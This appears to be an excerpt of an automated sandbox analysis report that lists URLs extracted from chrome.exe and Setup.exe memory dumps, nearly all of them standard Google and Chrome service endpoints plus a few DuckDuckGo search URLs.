        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2585385922.0000691400BBC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
        Source: chrome.exe, 0000000D.00000003.1900763625.0000691401292000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900676282.000069140113C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1932134139.000069140114A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1930172320.0000691401698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
        Source: chrome.exe, 0000000D.00000003.1885460689.0000691000504000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
        Source: chrome.exe, 0000000D.00000003.1885460689.0000691000504000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
        Source: chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.2583997178.0000691400B34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.goog
        Source: chrome.exe, 0000000D.00000003.1878459904.00004180000DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580258683.00006914009B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2564891753.0000691400180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
        Source: chromecache_67.14.drString found in binary or memory: https://clients6.google.com
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
        Source: chromecache_67.14.drString found in binary or memory: https://content.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2537616209.000001B008EED000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
        Source: chrome.exe, 0000000D.00000002.2579719052.0000691400974000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
        Source: chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608165594.0000691401540000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
        Source: chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
        Source: chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573693016.0000691400708000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
        Source: chromecache_67.14.drString found in binary or memory: https://domains.google.com/suggest/flow
        Source: chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2e
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591800891.0000691400E6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chrome.exe, 0000000D.00000003.1900343642.000069140107C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
        Source: chrome.exe, 0000000D.00000002.2618618405.0000691401E04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en&family=Product
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
        Source: chromecache_69.14.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
        Source: chrome.exe, 0000000D.00000003.1885402808.00006910004E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hQ
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/mQ
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
        Source: chrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
        Source: chrome.exe, 0000000D.00000002.2561271210.0000691400004000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/
        Source: chrome.exe, 0000000D.00000002.2579937966.000069140098C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
        Source: chrome.exe, 0000000D.00000003.1934861305.0000691401D54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
        Source: chrome.exe, 0000000D.00000002.2590248453.0000691400DB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611075318.0000691401750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
        Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default_defaultult
        Source: chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
        Source: chrome.exe, 0000000D.00000002.2608165594.0000691401540000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
        Source: chrome.exe, 0000000D.00000002.2585522088.0000691400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611297831.0000691401804000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
        Source: chrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
        Source: chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
        Source: chrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
        Source: chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2543861158.000001B00DD5D000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogs.google.com
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
        Source: chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.goog
